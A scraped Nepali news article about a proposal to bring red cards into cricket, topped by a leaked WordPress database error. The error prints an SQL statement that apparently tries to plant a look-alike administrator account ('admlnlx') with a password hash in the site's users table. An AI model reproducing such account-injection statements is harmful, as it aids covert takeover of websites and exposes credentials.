WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BF0GAgiVQFY8XRvx6LQttxHXIwAIJ11', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 01:22:25', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर २३–
जब फुटबलरले मैदानमा गल्ती गल्ती गर्छ, उसले रातो कार्ड पाउँछ र मैदान छाड्छ । तर, क्रिकेटमा ? अहिलेसम्म कुनै व्यवस्था छैन ।
तर, अर्को वर्ष पहिलो क्रिकेटमा पनि रातो कार्ड प्रयोग हुने भएको छ । खेलाडीले गम्भीर अनुशासन उल्लंघन गरेमा अम्पायरले रातो कार्ड दिएर खेलबाट हटाउन सक्नेछन् ।
एमसीसी विश्व क्रिकेट कमिटीका सदस्य रिकी पोन्टिङले तल्लो लेभरको क्रिकेटमा परिर्वतनबारे कुराकानी भइरहेको बताए ।
बीबीसीका अनुसार यो नयाँ नियम एसीसीसीको मुख्य कमिटीले अनुमोदन गरेमा सबै लेभरको क्रिकेटमा १ अक्टोबर २०१७ बाट लागू हुनेछ ।
प्रस्ताव अनुसार तीन गल्तीमा खेलाडीले रातो कार्ड पाउन सक्छन् । अम्पायरलाई धम्क्याएमा, अरु खेलाडी, अम्पायर, अफिसियल वा दर्शकमाथि आक्रमण गरेमा वा मैदानमा हिंसाजन्य अन्य कुनै काम गरेमा रातो कार्ड दिइनेछ ।
यो कमिटीले रन पेनाल्टी लगायतका अरु नियमबारे समेत छलफल गरिरहेको पोन्टिङले बताए । –अनलाईन खबरबाट